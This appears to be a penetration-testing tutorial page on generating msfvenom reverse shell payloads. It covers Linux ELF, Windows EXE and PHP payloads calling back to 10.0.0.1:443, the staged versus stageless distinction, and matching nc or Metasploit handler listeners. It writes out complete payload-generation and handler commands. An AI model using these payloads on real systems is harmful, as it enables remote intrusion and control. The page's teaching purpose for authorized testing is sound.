Skip to content
reverseshell

msfvenom Reverse Shell: Staged vs Stageless and the Listener Trap

How to generate a reverse shell with msfvenom, the difference between staged and stageless payloads, and why your nc listener catches one but not the other.

Published on 2 min read
msfvenomreverse-shellmetasploit

msfvenom generates a payload as a file — an ELF, EXE, or script you deliver and execute — rather than a one-liner you paste. It is the right tool when you need a compiled binary or a specific format, and the wrong tool when a one-liner would do. The part that trips everyone up is not generation; it is matching the payload to the correct listener.

Generating the Payload

The pattern is -p PAYLOAD LHOST= LPORT= -f FORMAT -o FILE:

# Linux ELF, stageless
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -f elf -o shell.elf

# Windows EXE, stageless
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -f exe -o shell.exe

# PHP, for a web target
msfvenom -p php/reverse_php LHOST=10.0.0.1 LPORT=443 -f raw -o shell.php

-f controls the output format; msfvenom --list formats shows them all. List payloads with msfvenom --list payloads | grep reverse.

Staged vs Stageless — the Core Distinction

This is the single most important thing to understand, because it dictates your listener.

  • Stageless (shell_reverse_tcp): the entire shell is in the payload. It connects back and you have a shell. A plain nc -lvnp 443 catches it.
  • Staged (shell/reverse_tcp — note the slash): the payload is a tiny stager that connects back and downloads the rest of the shell from your handler. A plain nc listener receives the stager's request, has nothing to send back, and the shell dies instantly.

Read the payload name carefully: an underscore (shell_reverse_tcp) is stageless; a slash (shell/reverse_tcp) is staged. That one character decides whether nc works.

The Listener Trap

The number-one msfvenom complaint — "it connects then immediately disconnects" — is almost always a staged payload hitting a dumb listener. Staged and Meterpreter payloads need Metasploit's handler, configured with the exact same payload:

msfconsole -q -x "use exploit/multi/handler; \
set payload windows/x64/shell_reverse_tcp; \
set LHOST 10.0.0.1; set LPORT 443; run"

PAYLOAD, LHOST, and LPORT in the handler must match what you put in msfvenom exactly. If you want to catch with plain nc, generate a stageless payload. This is the same payload-vs-listener mismatch covered generally in choosing a listener — msfvenom just makes it easy to get wrong.

When NOT to Use msfvenom

If the target already has bash, python, or PHP, a one-liner is faster, fileless, and leaves less on disk than a generated binary. Reach for msfvenom when you specifically need a compiled artifact or a Meterpreter session — otherwise see bash, python, or the reverse shell generator for a one-liner with the matching listener already attached.

Authorized Testing Only

Generate and deploy msfvenom payloads only against systems you own or are explicitly authorized to test. The authorization is what makes the work legitimate, not the tooling.

Related articles

What Is a Reverse Shell? A Practical Guide for Authorized Testing
A plain-English explanation of how reverse shells work, why they beat bind shells through firewalls, and how a reverse shell generator saves you from copy-paste mistakes.
reverse-shellfundamentalsgenerator
Bash Reverse Shell One-Liners: How /dev/tcp Actually Works
The common bash reverse shell one-liners explained line by line, why they need bash (not sh), and how to fall back when /dev/tcp is missing.
bashreverse-shelllinux
Python Reverse Shell: One-Liners That Survive python vs python3
How the python reverse shell one-liner works with socket and pty, why the python/python3 split breaks payloads, and a version-agnostic fallback.
pythonreverse-shelllinux